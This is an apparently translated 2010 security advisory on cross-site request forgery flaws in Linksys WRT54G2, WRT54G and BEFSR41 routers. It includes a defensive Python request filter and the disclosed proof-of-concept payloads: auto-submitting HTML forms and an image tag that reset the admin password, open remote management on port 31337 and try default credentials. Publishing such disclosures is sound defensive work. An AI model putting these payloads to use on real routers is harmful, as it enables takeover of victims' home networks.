Linksys WRT54G2/BEFSR41 Cross-Site Request Forgery Vulnerability

Published: 2010-12-06
Updated: 2010-12-07

Affected systems:
Linksys BEF x.x
Linksys WRT54G2 Wireless-G Broadband Router
Description:
The Linksys WRT54G2 is a Wireless-G broadband router; the BEFSR41 is a home wired router.

The Linksys WRT54G2 / BEFSR41 contain an implementation vulnerability that an attacker can exploit to launch cross-site request forgery attacks.

The vulnerability has two causes: 1) a Security.tri error caused by missing authentication; 2) a web interface error caused by the device allowing users to change the router configuration through HTTP requests without performing any validity check on the request.

<*Source: Martin Barbella
  
  Link: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0027.html
*>
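As an added illustration (not part of this advisory or of any Linksys firmware), the following Python sketch shows the server-side checks whose absence the description above points to: configuration changes only over POST, an Origin/Referer check against the router's own origin, and a per-session synchronizer token. The endpoint names come from the proof-of-concept on this page; the trusted origin, the malicious.example origin, the session id and the server secret are constructed values.

```python
# Added example (not from the advisory or from Linksys firmware): a request
# filter for router-style configuration endpoints. Sample requests below are
# constructed replays of the PoC forms shown on this page.
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# The router's own web origin(s); legitimate admin pages are served from here.
TRUSTED_ORIGINS = {"http://192.168.1.1", "https://192.168.1.1"}

# Endpoints named in the advisory that change configuration (password,
# remote management, WAN port, UPnP). Anything here must pass every check.
STATE_CHANGING_PATHS = {"/Manage.tri", "/manage.tri", "/Gozila.cgi"}


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]              # header names lower-cased
    form: Dict[str, str] = field(default_factory=dict)
    session_id: Optional[str] = None     # from the session cookie, if any


def origin_from_url(url: str) -> Optional[str]:
    """scheme://host[:port] of a URL, dropping any user:pass@ userinfo."""
    p = urlsplit(url)
    if not p.scheme or not p.hostname:
        return None
    host = p.hostname if p.port is None else f"{p.hostname}:{p.port}"
    return f"{p.scheme}://{host}"


def issue_csrf_token(server_secret: bytes, session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC (no server storage)."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_change(req: Request, server_secret: bytes) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request to a configuration endpoint."""
    if req.path not in STATE_CHANGING_PATHS:
        return True, "not a state-changing endpoint"

    # 1. A GET must never change state: the BEFSR41 PoC rides on an <img> tag.
    if req.method.upper() != "POST":
        return False, "state change attempted with " + req.method.upper()

    # 2. The request must come from the router's own pages. Origin is
    #    preferred, Referer is the fallback; a missing header is rejected
    #    because a form auto-submitted from another site may strip it.
    src = req.headers.get("origin") or req.headers.get("referer")
    if src is None:
        return False, "no Origin/Referer header"
    src_origin = origin_from_url(src)
    if src_origin not in TRUSTED_ORIGINS:
        return False, f"cross-origin request from {src_origin}"

    # 3. The form must carry the per-session token the admin page embedded.
    if req.session_id is None:
        return False, "no authenticated session"
    expected = issue_csrf_token(server_secret, req.session_id)
    if not hmac.compare_digest(expected, req.form.get("csrf_token", "")):
        return False, "missing or wrong CSRF token"
    return True, "ok"


SERVER_SECRET = b"constructed-demo-secret"   # random and persistent on a real device
SESSION = "sess-42"                          # constructed session id

# Constructed replay of the WRT54G2 PoC: the victim's browser posts a hidden
# form from another site while the admin session cookie is still valid.
POC_POST = Request(
    method="POST", path="/Manage.tri",
    headers={"origin": "http://malicious.example"},
    form={"MANAGE_PASSWORDMOD": "1", "MANAGE_REMOTE": "1", "MANAGE_PORT": "31337"},
    session_id=SESSION,
)

# Constructed replay of the BEFSR41 PoC: an <img> tag issues a GET.
POC_IMG_GET = Request(
    method="GET", path="/Gozila.cgi",
    headers={"referer": "http://malicious.example/page.html"},
    form={"PasswdModify": "1", "Remote_Management": "1"},
    session_id=SESSION,
)

# Legitimate change submitted from the router's own admin page.
LEGIT_POST = Request(
    method="POST", path="/Manage.tri",
    headers={"origin": "http://192.168.1.1"},
    form={"MANAGE_REMOTE": "0", "csrf_token": issue_csrf_token(SERVER_SECRET, SESSION)},
    session_id=SESSION,
)


def run_demo() -> Dict[str, Tuple[bool, str]]:
    cases = [("poc_post", POC_POST), ("poc_img_get", POC_IMG_GET), ("legit", LEGIT_POST)]
    return {name: check_state_change(r, SERVER_SECRET) for name, r in cases}


if __name__ == "__main__":
    for name, (ok, why) in run_demo().items():
        print(f"{name:12s} {'ALLOW' if ok else 'BLOCK'}  {why}")
```

The Origin/Referer check alone already stops both PoC variants; the token is the defence that survives when the browser sends neither header. Note that `origin_from_url` ignores URL userinfo such as `a:admin@`, which is the right behaviour for an origin comparison but does nothing about default credentials themselves: changing the admin password is a separate mitigation.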

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and educational purposes only. Use at your own risk!

Martin Barbella provided the following test method:

WRT54G2 PoC (tested with hardware version 1.5 and firmware version 1.50):

<html>
  <head>
    <title>WRT54G2 CSRF PoC</title>
  </head>
  <body onload="document.getElementById('F').submit()">
    <form action="http://192.168.1.1/Manage.tri" method="post" id="F">
      <input type="hidden" name="MANAGE_USE_HTTP" value="0" />
      <input type="hidden" name="MANAGE_HTTP" value="1" />
      <input type="hidden" name="MANAGE_HTTP_S" value="0" />
      <input type="hidden" name="MANAGE_PASSWORDMOD" value="1" />
      <input type="hidden" name="MANAGE_PASSWORD" value="__pwn3d__" />
      <input type="hidden" name="MANAGE_PASSWORD_CONFIRM" value="__pwn3d__" />
      <input type="hidden" name="_http_enable" value="1" />
      <input type="hidden" name="MANAGE_WLFILTER" value="1" />
      <input type="hidden" name="MANAGE_REMOTE" value="1" />
      <input type="hidden" name="MANAGE_PORT" value="31337" />
      <input type="hidden" name="MANAGE_UPNP" value="1" />
      <input type="hidden" name="layout" value="en" />
    </form>
  </body>
</html>




The form's action can be changed in the following way to attempt to
log in with the default password:

<form action="http://a:admin@192.168.1.1/Manage.tri" method="post" id="F">




As I mentioned before, success of this type of exploit depends on the
victim's browser. This is simply blocked in IE8, while Safari will
give a phishing warning, Firefox warns the user that they are
attempting to log in with the name "a", and Google Chrome simply
allows the request without notifying the user in any way.




WRT54G PoC (tested with hardware version 6 and firmware version 1.02.8):

<html>
  <head>
    <title>WRT54G CSRF PoC</title>
  </head>
  <body onload="document.getElementById('F').submit()">
    <form action="http://192.168.1.1/manage.tri" method="post" id="F">
      <input type="hidden" name="remote_mgt_https" value="0" />
      <input type="hidden" name="http_enable" value="1" />
      <input type="hidden" name="https_enable" value="0" />
      <input type="hidden" name="PasswdModify" value="1" />
      <input type="hidden" name="http_passwd" value="__pwn3d__" />
      <input type="hidden" name="http_passwdConfirm" value="__pwn3d__" />
      <input type="hidden" name="_http_enable" value="1" />
      <input type="hidden" name="web_wl_filter" value="1" />
      <input type="hidden" name="remote_management" value="1" />
      <input type="hidden" name="http_wanport" value="31337" />
      <input type="hidden" name="upnp_enable" value="1" />
      <input type="hidden" name="layout" value="en" />
    </form>
  </body>
</html>




To attempt a login with the default password, the same type of
modification can be made, as shown here:

<form action="http://a:admin@192.168.1.1/manage.tri" method="post" id="F">




BEFSR41 PoC (tested with hardware version 3 and firmware version 1.06.01):

<img src="http://192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
     alt="Nothing to see here." />




And once again, a modification can be made to attempt to log in with
the default password, as shown here:

<img src="http://a:admin@192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
     alt="Nothing to see here." />

Recommendation:
Vendor patch:

Linksys
-------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:

http://www.linksys.com

This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.